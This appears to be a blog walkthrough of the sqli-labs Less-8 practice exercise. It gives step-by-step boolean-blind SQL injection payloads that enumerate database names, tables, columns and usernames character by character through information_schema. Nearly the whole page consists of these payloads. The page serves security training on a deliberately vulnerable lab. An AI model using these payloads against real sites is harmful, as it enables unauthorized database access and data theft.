当前位置:网站首页>sqli-labs(less-8)
sqli-labs(less-8)
2022-07-28 12:34:00 【Unknown white hat】
Catalog
less-8( Bull's blind note ) manual
2. Judge the number of databases
3. Determine the length of the first database character
4. according to ascii Code to determine the specific characters of each library name
5. Judge security Number of tables in the Library
6. Judge security The length of the first table name in the Library
7. Judge security The first character of the first table in the Library ascii value
8. Judge security.users Number of fields in the table
9. Judge security.users The length of the first field of the table
10. Judge security.users The first character of the first field of the table ascii value
11. Judge security.users How many rows of data does the table have
12. Judge user The first row in the table username The data length of the field
13. Judge user The first row in the table username The first character of the field ascii value
less-8( Bull's blind note ) manual
1. Judge the closing mode
2. Judge the number of databases
?id=1' and (select count (schema_name) from information_schema.schemata)= Number of databases ( from 1 Start guessing ) -- -
3. Determine the length of the first database character
?id=1' and (select length(schema_name) from information_schema.schemata limit 0,1)=18 -- -
4. according to ascii Code to determine the specific characters of each library name
?id=1' and ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1))=105 -- - # It can be used > and < Judge the approximate position
5. Judge security Number of tables in the Library
?id=1' and (select count(table_name) from information_schema.tables where table_schema='security')=4-- -
6. Judge security The length of the first table name in the Library
?id=1' and (select length(table_name) from information_schema.tables where table_schema='security' limit 0,1)=6 -- -
7. Judge security The first character of the first table in the Library ascii value
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101 -- -
8. Judge security.users Number of fields in the table
?id=1' and (select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=3-- -
9. Judge security.users The length of the first field of the table
?id=1' and (select length(column_name) from information_schema.columns where table_schema='security' and table_name='users' limit 0,1)=2 -- -
10. Judge security.users The first character of the first field of the table ascii value
?id=1' and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))=105 -- -
11. Judge security.users How many rows of data does the table have
?id=1' and (select count(username) from security.users)=13 -- -
12. Judge user The first row in the table username The data length of the field
?id=1' and (select length(username) from security.users limit 0,1)=4 -- -
13. Judge user The first row in the table username The first character of the field ascii value
?id=1' and ascii(substr((select username from security.users limit 0,1),1,1))=68-- -
边栏推荐
- Google Earth engine (GEE) -- problems in the use of coordinate projection and reduceresolution functions in image downscaling
- Develop NES game (cc65) 07 and controller with C language (collision with spirit)
- 30 years of open source community | 2022 open atom global open source summit 30 years of special activities of open source community were successfully held
- 用C语言开发NES游戏(CC65)04、完整的背景
- 【一知半解】零值拷贝
- With the continuous waves of infringement, the U.S. patent and trademark office began to study the impact of NFT on copyright
- 用C语言开发NES游戏(CC65)07、控制器(和精灵碰撞)
- Developing NES game (cc65) 07 and controller with C language
- 云原生机器学习落地难?灵雀云助力企业快速应用 MLOps
- Is it difficult for cloud native machine learning to land? Lingqueyun helps enterprises quickly apply mlops
猜你喜欢
Is it difficult for cloud native machine learning to land? Lingqueyun helps enterprises quickly apply mlops
设计一个线程池
Developing NES games with C language (cc65) 11. Metatiles
First in the country! The two standards of "data product registration" formulated by insight technology and Shandong data were officially released
DIY system home page, your personalized needs PRO system to meet!
Implementation method of mouse hover, click and double click in ue4/5
Zhou Hongyi talks about Internet thinking: users, not customers
Live: never believe that suffering is worth it. Suffering is suffering
金九银十 再不卷就来不及了
Image filter from the perspective of convolution
随机推荐
[try to hack] intranet Foundation
1331. 数组序号转换 : 简单模拟题
Not optimistic about Apple making AR, Luo Yonghao: I'll do it myself
PHP日期时间运用:添加或减去特定日期的天数
Sub database and sub table may not be suitable for your system. Let's talk about how to choose sub database and sub table and newsql
用C语言开发NES游戏(CC65)07、控制器(和精灵碰撞)
Knowledge points of MySQL (13)
【vulnhub】presidential1
Lyscript get previous and next instructions
Laravel $object->updated_at 返回的是Carbon对象,如何返回正常时间格式
Detailed deployment and configuration of CEPH cluster (II)
Multi Chain and multi currency wallet system development cross chain technology
PHP date time application: add or subtract the number of days of a specific date
Exploration on cache design optimization of community like business
解决PHP提示Warning: Division by zero in错误
8000 word explanation of OBSA principle and application practice
Use Baidu PaddlePaddle easydl to complete garbage classification
Most of the interfaces of Tiktok are already available, and more interfaces are still open. Please look forward to it
聚变云原生,赋能新里程 | 2022 开放原子全球开源峰会云原生分论坛圆满召开
Implementation method of mouse hover, click and double click in ue4/5